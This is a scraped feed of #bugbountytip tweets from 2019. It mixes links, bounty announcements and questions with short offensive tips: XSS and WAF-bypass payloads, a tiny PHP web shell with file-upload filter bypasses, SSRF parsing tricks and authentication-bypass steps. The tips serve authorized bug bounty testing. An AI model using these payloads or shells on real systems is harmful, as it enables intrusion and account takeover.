gweeperx
@gweeperx


2019-09-18 07:42:39
2 Just another XHR cookie/body stealer: https://t.co/kbmsAYuwsJ #bugbounty #bugbountytip #bugbountytips
ʊռӄռօառ ʊֆɛʀ
@Unknownuser1806


2019-09-18 03:39:15
0 DetExploit - Software That Detect Vulnerable Applications, Not-Installed OS Updates And Notify To User https://t.co/HrwGYO0fjL #bugbounty , #bugbountytip ,#hacking
ʊռӄռօառ ʊֆɛʀ
@Unknownuser1806


2019-09-18 03:33:03
0 #XSS, #SQLi, #CSRF, #SSRF, #XXE, OS command #injection, directory traversal., and #HTTPrequest smuggling. - > Everything you need to getting started with #bugbounty #bugbountytip , #hacking https://t.co/4ZnwNy6STO
daniel_v
@danielv47251669


2019-09-17 18:09:57
0 #bugbountytip #bugbountytips >found a login page restricted to business email only >intercepted the signup request > intercepted response from this request > changed response body from "false" to "true" > auth bypass > internal access to the platform
farukh
@Farukhwap


2019-09-17 16:17:30
0 @Olacabs @ola_supports @olamoney_in @OlainUK why is it empty 🤔 #fixit #bugbountytips #bugbountytip #loot #Ola https://t.co/CS0HUxo0if
luffydragneel
@Hackers_Guild


2019-09-17 15:56:39
0 Suppose there is contracts page at https://t.co/guSo2PGluZ meant only for Admins and not visible in the lower privileged user's UI. Just directly browse to that page from this lower privileged account, and you might end up seeing the contents there. #bugbountytip #bugbounty https://t.co/1cOxnJ0OTI
Vulkey_Chen
@Vulkey_Chen


2019-09-17 13:52:17
1 #bugbountytip #burpsuite #bugbountytips #bughunter I build a burpsuite extension to mark sensitive information.If "mobile phone number" and "email address" information appear in the response content, then mark this request for red color. https://t.co/qeY996qzTi
ʊռӄռօառ ʊֆɛʀ
@Unknownuser1806


2019-09-17 12:54:42
0 Awesome #Shodan search queries https://t.co/Wo0inc380w #bugbounty , #bugbountytip ,#hacking
Vedant
@ved_wayal


2019-09-17 08:58:43
0 Blind XSS is lub 😜😍 #bugbountytip https://t.co/GHlwkPix6W
Rishabh
@____cypher____


2019-09-17 06:58:06
0 SSRF tip: [email protected] ==> black[.]com black[.]com?white[.]com ==> black[.]com black[.]com#white.com ==> black[.]com #bugbountytip #BugBounty #bugbountytips
oops
@a_l_e_r_t_1_


2019-09-17 06:44:01
0 Search for high-level vulnerabilities if you don't want the vulnerability to be duplicated :) #bugbountytip
Sultan Haikal
@SultanMoeslim


2019-09-17 06:08:28
0 {Reviews} in bugbounty, report recipients ... are taking more references from reporters! to imitate / change systematic design, secure etc. reporters don't get any profit. and those who change this, of course benefit internally. best manipulation. #bugbounty #bugbountytip
AFAQUE KHAN
@Afaquekhan24


2019-09-17 05:13:43
1 @stereotype32 Remember you fools...you bug bounty hunter fools... any bypass technique that is publicly posted no longer work in real world scenario .....this is my #protip for today #hackerone #bugbountytip #BugBounty #bugbountytips #bugcrowd ...Happy hunting...
Pomegranate 🌴
@ret2pomegranate


2019-09-17 04:33:45
1 When you & your partner get a bounty. #bugbountytip #bugbounty #infosec https://t.co/3rjqUgsXeE
luffydragneel
@Hackers_Guild


2019-09-17 03:46:04
1 Suppose the sensitive content is at /folder/content. If there is proper access control on /folder, it doesn't mean that there is proper access control when you visit /folder/content directly. Always look for access control issues on each endpoint. #bugbountytip #bugbounty https://t.co/J8jVcy2IKB
Pomegranate 🌴
@ret2pomegranate


2019-09-16 23:47:44
0 Just reported Double-Sequence XSS which affects 2 parameters in a single endpoint to a program on @Hacker0x01. #bugbounty #bugbountytip #infosec
Michele Romano
@Mik317_


2019-09-16 18:22:47
0 @Manikan77602456 understand how programs work, and definitely how other researcher think ;). Probably see how reports are thought/presented/explained is the best thing you can do to learn. Also, check Twitter #bugbountytip and similar: you'll find good bypasses or medium articles.
Jakub Juszczak
@apertureless


2019-09-16 12:11:31
0 Blind XSS is still my favorite. Spray the payload and after some time, you receive your christmas present 🎁 #infosec #bugbountytip
intigriti
@intigriti


2019-09-16 11:56:17
2 This actually worked on the first site we tested! 🤯 P.S.: Legacy or unimplemented OAuth flows often contain vulnerabilities that can lead to account takeover. 😈 Thanks for the #BugBountyTip, @ngalongc! https://t.co/vwAi9hhHrm
SilexSecure
@silexsecure


2019-09-16 11:23:55
0 @silexsecure Today you will learn WordPress penetration testing using WPScan and Metasploit. @rsilexlab @metasploit @ubuntu @kalilinux @wordpressdotcom #infosec #cybersecurity #bugbountytip #bugbounty #Pentesting #GodMorningmonday #CyberAttack #SSL#GOODhat
Karna
@karna__1


2019-09-16 11:04:38
1 If you want a free online phone number service to receive OTP(s) for your web app testing, here's one: https://t.co/3dPt58DZGy #bugbounty #bugbountytip
Oops!
@Corrupted_brain


2019-09-16 10:17:18
0 This Oracle directory architecture was quite helpful for me to harvest critical information by exploiting XXE and reading files locally. #bugbountytip #bugbounty #Oracle https://t.co/Fjhg3OX2Gd
Sp
@spt_2020


2019-09-16 10:06:29
0 Collection Of Bug Bounty Tip-Will Be updated daily https://t.co/BYm6GxAFnz #bugbountytip
oops
@a_l_e_r_t_1_


2019-09-16 08:48:37
0 Cheap and no ads. Bug bounty is everywhere. 1 Bug = 60 x App. Learn & Hack & Earn Money. Good Hacking! https://t.co/JPaA4CKmfO #openredirection #xss #xxe #ssrf #bounty #rce #graphql #sqlinjection #bugbountytip #webpentest #owasp #bugbountytip #python #ruby #csfr #hack #hackers
Juha Remes
@juha_remes


2019-09-16 08:36:33
0 This is a great #bugbountytip. 👍 https://t.co/XteWTBVmMe
oops
@a_l_e_r_t_1_


2019-09-16 08:22:45
0 Really very, very slow in fixing gitlab vulnerabilities #bugbountytip
Pomegranate 🌴
@ret2pomegranate


2019-09-16 05:54:08
0 #BugBounty #bugbountytip #infosec Normal User: “Text Injection” (The Depression Period) Bug Bounty Hunter: Arbitrary Spoofed Character Encoded Injection via the Roman Alphabet. https://t.co/Z20cvTDtUG
Pomegranate 🌴
@ret2pomegranate


2019-09-16 03:35:05
2 Just reported XSS to a program on @Hacker0x01. #InfoSec #bugbounty #bugbountytip Got XSS through a POST request in a parameter, automated it through my web-server due to `document.location.href=` being used in the vulnerable parameter.
ʊռӄռօառ ʊֆɛʀ
@Unknownuser1806


2019-09-16 02:45:02
0 This tool collects all information about all devices that are directly connected to the internet with the specified keywords that you enter. This way you get a complete overview. #shodaneye : https://t.co/AarJFRVDOP #hacking #bugbounty #bugbountytip
A DNF 🦖
@binb4sh


2019-09-16 01:08:34
0 If the target server is running Windows and you can create files and directories on it, try to create ones with forbidden names (CON,AUX,etc)! It may cause errors resulting in Info Disclosure/DoS. An example written in PHP: file_put_contents("con.png",""); #bugbountytip
terjanq
@terjanq


2019-09-16 00:22:36
3 I haven't published any writeups in a while. Here is my latest #writeup to an awesome #buyify challenge from #csaw19 #ctf that has just ended a few hours ago. The author of the task is @itszn13. You should definitely check this out! https://t.co/uAWk6hsyoI #bugbountytip
Drok3r🏴‍☠️
@drok3r


2019-09-15 21:23:18
0 pixload -- Image Payload Creating tools #bugbountytip #payload Link [ https://t.co/6wh5X9EWXB ] https://t.co/Fc4kBuKmMp
securibee 🐝
@securibee


2019-09-15 19:19:08
0 @Random_Robbie @j_opdenakker @Vin1515 @zseano @NahamSec @TomNomNom @d0nutptr @stokfredrik @yaworsk @Alyssa_Herrera_ has great content as well make sure to follow her! @ITSecurityguard Follow #bugbountytip although it's pretty noisy. Subscribe to newsletter from @PentesterLand https://t.co/e2fgYy31Gr I keep forgetting people. My bad!
dykaushik
@dykaushik


2019-09-15 17:40:17
0 Collection Of Bug Bounty Tip-Will Be updated daily https://t.co/GGQro6C5zH #bugbountytip
Mayur Parmar
@th3cyb3rc0p


2019-09-15 17:13:52
0 Must read blog🙂 https://t.co/4nQ54tutfD #bugbountytip #BugBounty #bughunting #ethicalhacking
W🌍aR🐁eeq
@wareeq_shile


2019-09-15 16:44:53
0 Can this still be taken over? #BugBounty #bugbountytip #bugbountytips https://t.co/nN5Xdani38
Wh11teW0lf
@Wh11teW0lf


2019-09-15 16:26:05
1 #bugbountytip The most vulnerable place in Wordpress/Drupal is a custom themes and plugins. Wordpress Location: /wp-content/themes/ and /wp-content/plugins/ You can found their name with Waybackarchive or site map in Burp.
Murdockz
@Murdockz_CEH


2019-09-15 14:50:00
0 Passive recon 😁 #bugbountytip #bugbountytips #bugbounty https://t.co/oCvjzwcsb6
Somdev Sangwan
@s0md3v


2019-09-15 13:27:18
0 @yassergersy Why is this #bugbountytip and not #websecuritytip?
vavkamil
@vavkamil


2019-09-15 13:01:34
1 How to bypass Android certificate pinning and intercept SSL traffic #bugbounty #bugbountytip https://t.co/KFRUCYEc96
Youssef A. Mohamed
@GeneralEG64


2019-09-15 12:36:29
4 The easiest P1 ever!! 😂😍 Steps to Reproduce: Navigated to https://t.co/CEADFzHYUD Directory Bruteforcing found "admin" Bruteforcing into it found "users.db" Exposing admin's creds in plaintext! Logging in to the Admin Panel. #BugBounty #bugbountytip https://t.co/7SuX3E5otC
BlackClover
@Bc10ver


2019-09-15 12:15:41
0 Top story: @yassergersy: '#bugbountytip : Load response , extract all valid parameters names , submit all as get and post parameters , check which one is being reflected , you will increase your chances to get #xss ' https://t.co/dkBDDSkQ0n, see more https://t.co/fVnXn9Z0FJ
👻in🐚
@0xerror


2019-09-15 12:15:40
0 XSS News: @yassergersy: '#bugbountytip : Load response , extract all valid parameters names , submit all as get and post parameters , check which one is being reflected , you will increase your chances to get #xss ' https://t.co/TDrl37pldF, see more https://t.co/4VACxHYGGn
oops
@a_l_e_r_t_1_


2019-09-15 08:55:16
1 Cheap and no ads. Bug bounty is everywhere. 1 Bug = 60 x App. Learn & Hack & Earn Money. Good Hacking! https://t.co/JPaA4CKmfO #openredirection #xss #xxe #ssrf #bounty #rce #graphql #sqlinjection #bugbountytip #webpentest #owasp #bugbountytip #python #ruby #csfr #hack #hackers
nocomp
@nocomp


2019-09-15 08:01:13
0 Any good #BugBounty discord place for learn and share? #bugbountytip thx for RT
HackIsOn ®
@hackison


2019-09-15 07:57:21
0 Ghazi is a BurpSuite Plugins For Testing various PayLoads Like "XSS,SQLi,SSTI,SSRF,RCE and LFI" through Different tabs , Where Each Tab Will Replace Every GET or POST Parameters With Selected TAB in "Proxy" or "Repeater" TAB. https://t.co/PUhzq0SuEo #bugbounty #bugbountytip
(((Gamliel)))
@Gamliel_InfoSec


2019-09-15 05:12:49
0 Awesome #bugbountytip https://t.co/DnjdSHMcix
Securisec 🚀
@securisec


2019-09-15 02:08:06
0 "RT RT YoKoAcc: Bismillah. Releasing one of my RCE story at one of Bug Bounty Program. Race Condition that could Result to RCE - (A story with an App that temporary stored an uploaded file within 2 seconds before moving it to Amazon S3). https://t.co/j8fCpvwWy6 #bugbountytip…
Ankur Vaidya
@4N_CURZE


2019-09-15 00:14:37
0 Finally reached and completed one more milestone :) 😀😃😍😍♥️♥️♥️ #openbugbounty #xss #bugbounty #bugbountytip #bughunter #WhiteHats #pentest #Pentesting @openbugbounty @openbounty @whitehatsec @bugbountyforum https://t.co/zKVguucXI3
Pomegranate 🌴
@ret2pomegranate


2019-09-14 20:26:55
0 Just reported RCE to a program on @Hacker0x01. Wish me the best of luck. #infosec #bugbounty #bugbountytip Kind of nervous because of an accidental reboot that occurred while I was testing for a PoC.
Bijan Murmu
@0xBijan


2019-09-14 20:14:02
0 New write-up "How I found a simple and weird Account takeover bug" https://t.co/32185JXNW6 #bugbounty #bugbountytip
Aziz Hakim
@hackerb0y_


2019-09-14 20:09:17
0 I was logged in a program's portal!🧐 Suddenly I have visited this URL!🙄 https://*.redacted.com/user/profile/delete and GUESS what? My account got deleted without any confirmation!🤣 #bugbountytip #bugbounty
Murdockz
@Murdockz_CEH


2019-09-14 18:22:10
0 2. Will do a write up on how to exploit graphql after bug is fixed and bounty rewarded 😄...there is a part I can't disclose in part 1. #bugbountytip #BugBounty #bugbountytips
Murdockz
@Murdockz_CEH


2019-09-14 18:20:13
0 1. Able to read anyone's gender status when it is set to private or only show to friends. User A not friends with User B. User A can not see User B gender status. User A send a graphql request to user B private gender status is revealed. #bugbounty #bugbountytip #bugbountytips
Pomegranate 🌴
@ret2pomegranate


2019-09-14 16:10:14
0 Accidentally ran a software-specific ‘reboot’ command & crashed the server. It’s been 10+ hours and no response. Should I report this issue to the acquisition/asset? #bugbounty #InfoSec #bugbountytip
Aditya
@hetroublemakr


2019-09-14 14:15:05
1 Ran into an interesting blog on Medium about #bugbountytip #infosec by @bbinfosec https://t.co/kUUQiAWtca
YasserGersy
@yassergersy


2019-09-14 13:39:56
1 #bugbountytip : Load response , extract all valid parameters names , submit all as get and post parameters , check which one is being reflected , you will increase your chances to get #xss https://t.co/wEtN3fl4xT
oops
@a_l_e_r_t_1_


2019-09-14 12:42:06
0 My favorite xss payload : <img onerror="{alert`1`}" src> #bugbountytip
Fisher
@Regala_


2019-09-14 11:17:53
0 I'll experiment with streaming like all the cool kids are doing these days 😇 Starting October, schedule to be announced. Any particular subjects you'd be interested seeing or people? Let me know below 👇 #bugbounty #bugbountytip #infosec
Khaled Mohamed
@xelkomy


2019-09-13 20:15:20
0 shopify xss google auth this video awesome #bugbountytip #hackerone #BugBounty https://t.co/JbWlhXSOCK
Sandeep Raghav
@Sandeep_tunna


2019-09-13 18:03:30
0 Hey, @LinkedIn , I found a bug in your system. Please respond if you want to fix it. #bugbounty #testing #bugbountytip #LinkedIn
Simon
@7s26simon


2019-09-13 15:48:26
0 Submitted my first #bugbounty report !!! Hope it hasn't been reported already #ethicalhacker #hack #hacking #pentest #pentester #bugbountytip
Mohan Sri Ramakrishna
@S1r1u5_


2019-09-13 14:10:54
0 Yay, I was awarded a $500 bounty on @Hacker0x01! https://t.co/ac1KEZZZWM #TogetherWeHitHarder. #bugbountytip Actually, I am afraid to test the program cuz I saw some good hackers in the thanks page, But I started and I found a reflected XSS on the main page itself.😇
Mourad
@SecuAudit


2019-09-13 11:07:24
0 Any advice how to get into "Apache Axis version: 1.2.1" where remote admin is disabled ? #bugbountytip #bugbountytips
expl0itc0der
@vanshitmalhotra


2019-09-13 06:23:51
0 HTML to PDF converter bug leads to RCE in Facebook Server -- #BugBounty #BugBountyTip #Writeup https://t.co/UgmPhls8Mb
saranraj
@KceSaranraj


2019-09-13 01:58:28
0 I have the following code <li title="?"> test </li> I need to inject vector to break down the HTML Attributes and execute the alert using an event. is there a way to achieve this without using single/double quotes? <>&*#%\'" - Not Allowed @h1_kenan @le4rner #bugbountytip #xss
Mr.CryptoCZ
@cechv2


2019-09-12 06:56:18
0 #Electroneum #ETN $ETN is looking for Bug bounty hounters, IT Gurus, Hackers, if you want to earn money and help @electroneum be more secure go and check our Hackerone program #bugbountytip #Hacker #hackerone #fintech #app https://t.co/qUZ0h5mqqK
Yadhavi
@PrincessYadhavi


2019-09-12 05:18:36
0 Found a subdomain which is pointing to cloudfront using cname. And when i open the page it shows "NoSuchBucket" "The specified bucket does not exist" error. is subdomain takeover possible here? If yes, how? #bugbounty #bugbountytip #bugbountyhelp #s3

@pouyana1


2019-09-12 04:19:02
1 *content-length filtering: use small size shells like: <?='$_GET[x]'?> #bugbounty #bugbountytip #hacking #infosec #hack

@pouyana1


2019-09-12 04:19:01
0 *client side filtering: upload a valid file, intercept the request and change it to the shell extention (php,asp,jsp,..) *content-type filtering: change the content-type to valid content-type like: image/jpeg #bugbounty #bugbountytip #hacking #infosec #hack

@pouyana1


2019-09-12 04:19:01
1 file upload restriction bypass: * name filtering: 1) blackboxing: try to use file extentions like: php[3-n],phtml, pht. 2) whitelising: use null-byte:shell.php%00.gif use double extention format : shell.php.jpg or shell.jpg.php #bugbounty #bugbountytip #hacking #infosec #hack
Henry Chen
@chybeta


2019-09-12 03:06:03
1 bounty calculation formula: crontab(subdomain(amass+subfinder+...) + port(masscan + nmap) + screenshot + dirsearch) + slack = bug bounty #bugbounty #bugbountytips #bugbountytip https://t.co/QCODeeZhC3
Murdockz
@Murdockz_CEH


2019-09-12 00:25:03
0 Sometimes you need to take a long step back to learn new technologies in order to enhance your Bug Bounty skills. Learn the technology that companies use in order to break and exploit them even more. #bugbounty #bugbountytip #bugbountytips https://t.co/lge8ogvAPr
Arif Khan
@payloadartist


2019-09-11 07:06:15
1 Awesome giveaway! 🔥 #infosec #bugbounty #bugbountytip https://t.co/0qJjiSx3zl
Sukhmeet Singh
@MadGuyyy


2019-09-11 01:30:19
0 > Website had admin panel with "Login with Google" > Only allowed Google login with company's email > Created an email account [email protected] > Created Google account with that email > Logged into admin panel with Google. 💰$1500 #BugBountyTip #InfoSec #BugBounty
C1h2e1
@C1h2e11


2019-09-11 00:48:34
0 #bugbountytip #bugbountytips Using https://t.co/5gM8SE3B4J for subdomain monitoring, last night I found a .DS_Store leaking on the latest subdomain on https://t.co/5gM8SE3B4J
Guilherme Keerok
@k33r0k


2019-09-10 17:08:23
2 Cloudflare WAF bypass: open("https://host/?xss=%3Ca/href=javascript:1%26%26%26%23x6e;ame%3Eclick me%3C/a%3E","<svg onload=alert(document.domain)>"); #bugbountytip #bugbounty #xss #bugbountytips
Jenish
@_jensec


2019-09-10 16:39:37
2 Yay, I was awarded a $2,000 bounty on @Hacker0x01! For accessing company dashboard via creating account with Email “[email protected]” on main web app and login to dashboard with SSO. #bugbountytip
wywwzjj
@wywwzjj


2019-09-10 16:29:38
0 @artofwebhacking @chybeta https://t.co/O8D1Pp6IcP Here is a website that archive bug bounty tips. 👉https://t.co/Kvxfo3jCh8 Check it out, it has other useful resources too. 😀 #bugbounty #BugBountyTip #bugbountytips @Hacker0x01
o k t a v a n d i
@0ktavandi


2019-09-10 16:08:24
1 anyone have hackerone report with SSRF issue 307 redirect bypass?? #bugbountytip #bugbountytips
Rishabh
@____cypher____


2019-09-10 09:40:44
0 Perfect oneliner for subdomain enumeration curl -s 'https://t.co/A3Qe45ZOra%.'<TARGET>'&output=json' | jq '.[] | .name_value' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u #bugbounty #bugbountytip #bugbountytips #infosec
brsn
@brsn76945860


2019-09-10 04:08:46
0 @achillean @ItsReallyNick @x04steve @shodanhq I've tweeted this a few hours ago, but this works for me: ---------- import mmh3 import requests response = requests.get('https://yourwebsite/favicon.ico') favicon = response.content.encode('base64') hash = mmh3.hash(favicon) print hash ---------- #Shodan #bugbountytip
Securisec 🚀
@securisec


2019-09-09 14:25:30
0 "RT RT osamaavvan: My Writeup about Exploiting JSONP and Bypassing Referer Check. #bugbountytip #bugbountytips #Security https://t.co/pUyJV4QdcW"
Iheb
@ihebhamad514


2019-09-09 12:46:53
0 I found a #bugbounty program where it implements a captcha protection field after certain requests with burp intruder, the only way to bypass it is to delete the Cookie header. As a result, I got 2 valid users accounts. #bugbountytip
Aussan 🇨🇦
@aussan_m


2019-09-09 12:33:12
0 A lot of time people forget to look at the response or intercept the response in burp. Always examine the response in details especially when logging in. I was able to go from regular user to Admin by manipulating the response #bugbountytips #bugbountytip
Japz Divino
@japzdivino


2019-09-09 02:42:25
0 Reading hacktivity report will lead you to bounties by just bypassing the fix for the disclosed report.👌 #noobtip #bugbountytip https://t.co/ppnliULt5T
Hx01
@Hxzeroone


2019-09-08 05:35:30
1 #bugbountytip if the password reset link is shortened in email try checking for common hashes/encodings you may end up with gold mine, in the below scenario the url was shortened and the url id was sequential and encoded in base64 -->Scraping all generated password resets links. https://t.co/n11msD9iPP
x30r
@x30r_


2019-09-07 21:55:13
1 Into cyber security?? I don't know who votes what so lets have a poll! What suites you the most! #cybersecurity #bugbountytip #bugbounty #infosecurity #infoeec
Hussein Daher
@HusseiN98D


2019-09-07 19:40:04
7 Analysis of an RCE I found past week. RT and Like if you want more! If you got a bug bounty program, I'm open to any invite :) #bugbounty #bugbountytip #bugbountytips #infosec https://t.co/VX6QATnRJH
An0nym0us
@MeetAn0nym0us


2019-09-07 17:54:13
1 #bugbountytip While testing a Laravel site try injecting different kinds of payloads or change Request methods to GET>POST or POST>GET. this will result in Laravel exception handler error Disclosing AWS, Database, and SMTP Credentials. https://t.co/jTnU3rf28y
Zeinab Raadsato
@ZRaadsato


2019-09-07 17:21:09
0 All courses are available: Burp Suite, Ethical Hacking, Networking, Secure Coding Free for limited time. #bugbountytip #BugBounty https://t.co/fZCGs25uF0
Jenish
@_jensec


2019-09-07 09:34:14
0 Yay, I was awarded a $1,050 bounty on @Hacker0x01 for bypassing 2FA via old API version’s login page! https://t.co/YGr8yp0IKy #TogetherWeHitHarder #bugbountytip
Osama Avvan
@osamaavvan


2019-09-07 08:22:00
2 My Writeup about Exploiting JSONP and Bypassing Referer Check. #bugbountytip #bugbountytips #Security https://t.co/Ewt9p3qPSe
Muzammil Kayani 🇵🇰
@muzammilabbas2


2019-09-06 15:26:35
0 #bugbountytip:Access the site without loging into account you will get some hidden endpoints which are overlooked by others.
Tinu rockk
@TinuRock007


2019-09-06 11:14:47
0 https://t.co/kCnDw5TEZu Open redirect to xss (2019) @BugBountyPOC #bugbountytips #BugBountyPOC #BugBounty #security #bugbountytip #bugbountytips #xss https://t.co/KTAOhiR0I7
C1h2e1
@C1h2e11


2019-09-06 10:05:40
1 #bugbounty #Bugbountytip Yesterday's problem was solved, forgetting to modify the Conetent-length but result is duplicated . So sad
Shamem Ahmad
@blkryd


2019-09-06 09:13:48
0 Finding webshells in a linux server. find . -name "*.php" | xargs grep -E 'webshell|' #Bugbountytip #hacktolearn
Shamem Ahmad
@blkryd


2019-09-06 08:50:54
1 A plus sign (+) A simple URL encoded space (%20) A null byte (%00) A newline (%0a) A tab (%09) A carriage return (%0d) #Bugbountytip
OSRC
@OsrcSecurity


2019-09-06 07:59:10
0 We are updating the official website now, but always welcome all the hackers chasing the bug bounty of OSRC, any issue or question about the programs, just leave your messages or to our emailbox [email protected] #Hackers #Bugbountytip
Leonel Emiliano
@leoalgare


2019-09-06 05:02:35
0 Hey guys, is there any way to perform a bypass of CSRF if i need to set an specific XSRF-TOKEN in order to exploit the issue ? I wasn't able to use XHR because of CORS policy. Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: * #bugbountytips #bugbountytip
Shubham Sharma
@Shubham_pen


2019-09-06 03:13:23
7 Today you will learn WordPress penetration testing using WPScan and Metasploit. @rajchandel @metasploit @ubuntu @kalilinux @wordpressdotcom @github #infosec #cybersecurity #bugbountytip #bugbounty #Pentesting #GodMorningFriday #CyberAttack #oscp #blackhat https://t.co/KT2wD17IVG
ak1t4 🇦🇷
@akita_zen


2019-09-06 02:02:10
9 #Bugbountytip: forget the subdomains for recon! go directly for the ASN & hit the network-range organization: A new world arises without waf’s, a lot of messy SSL certs, unprotected hosts & private hidden scopes! #bugbounty #infosec #thinkOutsideTheBox
C1h2e1
@C1h2e11


2019-09-05 17:05:24
1 #bugbounty #BugBountyTip I found an HTTP Request Smuggling and looked for the endpoint that echoed the request. In this endpoint, I tried to enter the long data successfully, but I ended up testing only a few characters of the request I don't know why this is😂
Ammar Amer🇸🇾
@cry__pto


2019-09-05 14:17:38
1 -“An XSS on Facebook via PNGs & Wonky Content Types”: https://t.co/K7uiWoQtZ8 -shopifyapps XSS on sales channels via currency formatting: https://t.co/wu6SZ1DcxE -UNITED AIRLINES XSS: https://t.co/kRbaMJTXlN -GOOGLE TAG MANAGER STORED XSS: https://t.co/PBAj81OEE1 #BugBountyTip
Proxy
@LinuxKodachi


2019-09-05 13:49:35
0 Here is a website that archive bug bounty tips. 👉https://t.co/hG46WtG0dd Check it out, it has other useful resources too. 😀 #bugbounty #BugBountyTip #bugbountytips @Hacker0x01
emir c a
@emirca_


2019-09-05 10:13:07
0 Got the 500 error with single quote but can’t find the SQLi parameter for it... But 500 error can lead to SQLi right? #BugBounty #bugbountytip
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-09-05 05:59:42
0 CloudFlare {WAF} "R-XSS" Bypass; 🛡 ~ <isindex action="javas&tab;cript:alert(1)" type=image> ~ #BugBounty #BugBountyTip #WAF #infosec
David Schütz
@xdavidhu


2019-09-04 17:08:11
2 #bugbountytip - If your target requires phone number verification and you need more accounts, you can just buy a really cheap prepaid SIM card, and without topping it up, you can recieve the verification codes in SMS! ⚡ (even better if you have a dual-sim phone) https://t.co/oUDJKIik3X
Mourad
@SecuAudit


2019-09-04 16:25:54
0 How do you deal with your hosting server provider for large Port Scanning complaints ? #bugbounty #bugbountytip #pentesting #hackerone https://t.co/pn9Zzmxuaa
sudoka
@sudo_sudoka


2019-09-04 16:10:23
0 Does anyone have experience with @InternetNZ bugbounty program? #bugbounty #bugbountytip
intigriti
@intigriti


2019-09-04 12:27:00
6 Did you know you can extract the AWS S3 bucket name from an object URL by appending these parameters? 🕵️Thanks for the #BugBountyTip, @neeraj_sonaniya! #HackWithIntigriti https://t.co/cfVpRpOw1s
Hackers Academy
@Hackers_Academy


2019-09-04 10:40:17
0 98 Days Left! Introducing the 2nd training... @banyrock will take you on a 4 days journey of fully practical web hacking & bug hunting training. Be ready to learn some advanced techniques! #bugbountytip #Pentesting #infosec https://t.co/ixzLERf8Io https://t.co/9B4tg5DSvF
Rémy Marot
@R_Marot


2019-09-03 21:13:30
0 Quick #bugbountytip : if you are testing a symfony application, do not forget to check both app_dev.php and app_test.php controllers for debug information and sometimes sensitive information disclosure
Julien Ahrens
@MrTuxracer


2019-09-03 18:36:57
0 Plaintext password disclosure leading to admin access on a development environment. That just made my day. Remember: Always dig into JS files. They're a gold mine of stuff! #BugBounty #BugBountyTip
Dhamu
@Dhamuharker


2019-09-03 15:02:54
1 #bugbountytips The AWS Cloud Post Exploitation framework! POC https://t.co/nmhvNDdIRU #BugBounty #bugbountytip #ItTakesACrowd #togetherwehitharder
abdoul gadiri balde
@moodiAbdoul


2019-09-03 12:17:38
2 #bugbountytip you can also use https://t.co/SI3CMaQq42 during recon , just search your target website or app to know how it work in short of time #infosec #bugbounty
Un4gi
@Un4gi1


2019-09-03 08:50:20
0 #bugbountytip If you don’t have enough room for typical XSS, try <base href=//url.co>. This will make every link on the same page redirect to the URL referenced! 😃
Bob Nicolson
@NicolsonBray


2019-09-03 08:01:00
0 Google throws bug bounty bucks at mega-popular third-party apps https://t.co/ZSu5DHaLjf #BugBounty #bugbountytip #google #Apps #cybersec #infosec #Hackers https://t.co/UzhkCYOmww
Meelo
@CaptMeelo


2019-09-02 12:21:41
1 Just published another post that might be useful during #bugbounty or #recon sessions. #bugbountytip https://t.co/NTTaI2KqHE
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-09-02 06:43:33
6 ModSecurity { XSS } Detection Bypass; 🔐 { 1 }; <img src=x:alert(alt) onerror=eval(src) alt='spyerror'> { 2 }; "></tag><svg onload=alert(spyerror)> #BugBounty #BugBountyTip #WAF #infosec
Cyberthereaper
@Cyberthereaper3


2019-09-01 21:30:41
0 There is no csrf token when changing email.I'm creating csrf poc, and when I try to open poc.html with my other account, I get a "session expired" warning. what is the problem? How can i bypass it? #hackerone #bugcrowd #infosec #BugBounty #bugbountytip #csrf #intigriti
%00Termi
@Elhan65805947


2019-09-01 12:36:25
0 https://t.co/xNc07m02x7 >> campanyname.tld Paste >> https://t.co/NLo3oX2Loz Sometimes you may find upcoming project details, link to invite private meetings, other stuff. Keep on checking regularly. #bugbounty #bugbountytip
Ammar Amer
@cry__pto


2019-09-01 12:30:19
1 is is not difficult to bypass #XSS filters. remamber that firewall is a stupid device,just edit a s simple part of the payload . you can use encoding,tag modifiers. and a lot other ways like adding some unfamiliar characters or symbols to the payload. #bugbountytip
ak1t4 🇦🇷
@akita_zen


2019-09-01 01:43:09
7 #Bugbountytip: take your time to learn bash, curl & python 🐍 basics scripting. With only a few lines of those you can break anything! Automate your scripts & get the bests PoC’s #bugbounty #infosec
Cyberthereaper
@Cyberthereaper3


2019-08-31 17:22:20
0 how can i redirect xhr login page? İf i capture request with burp , web page redirecting other web page. But i cant do it wih url? Any idea? #hackerone #bugcrowd #bugbountytip #infosec #redirect #vulnerability
Security Chops
@securitychops


2019-08-31 15:05:31
0 /dev/random - One Liner For Installing Burp Certificate Into Android Nougat and Later #burp #android #BugBounty #bugbountytip https://t.co/BtVxMMy6Jb
sudoka
@sudo_sudoka


2019-08-31 12:17:54
1 CSP can support you to make a #clickjacking possible even when X-Frame-Options: DENY. #bugbounty #bugbountytip https://t.co/AQf5mQk84W
Proxy
@LinuxKodachi


2019-08-31 06:57:10
0 Here is a google dork to find discord servers. 👉 https://t.co/bmVpQAaOgy "keyword" #bugbountytip #OpenSource #osint #Discord
Elhan
@Elhan65805947


2019-08-30 20:09:48
0 A single little dork can give admin access. Site:https://t.co/AUzqSGF92I companyname.tld Bookmark else keep intresting tabs hanging. >> win! #BugBounty #bugbountytip
Mourad
@SecuAudit


2019-08-30 17:30:33
0 I just lost 3000$USD in 2 days trading Forex , definitively Bug Bounty is more profitable and less risky than trading😰 #BugBounty #bugbountytip
Jenish Sojitra
@_jensec


2019-08-30 16:58:57
0 Yay, I was awarded a $1,200 bounty on @Hacker0x01 for tricky privilege escalation ! “ If API endpoint /api/path/ep throwing 401 try to go with /api/path/ep.json “ and it will fetch out json data without checking access control ! #bugbountytip
sagar yadav
@sagaryadav8742


2019-08-30 16:32:42
0 Hotstar swag 😊 Happy to #secure #hotstar #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #bounty #sagaryadav8742 https://t.co/iAgSxeRFre
Cyberthereaper
@Cyberthereaper3


2019-08-30 16:31:00
0 Is have dork for out of band all injection method? #hackerone #bugcrowd #infosec #bugbountytip
intigriti
@intigriti


2019-08-30 14:19:13
2 Thanks for the #BugBountyTip, @securinti! #HackWithIntigriti (P.S.: You are now banned from our live webinars) 👀🚫 https://t.co/z8Cz3rAUgS
sagar yadav
@sagaryadav8742


2019-08-30 13:37:17
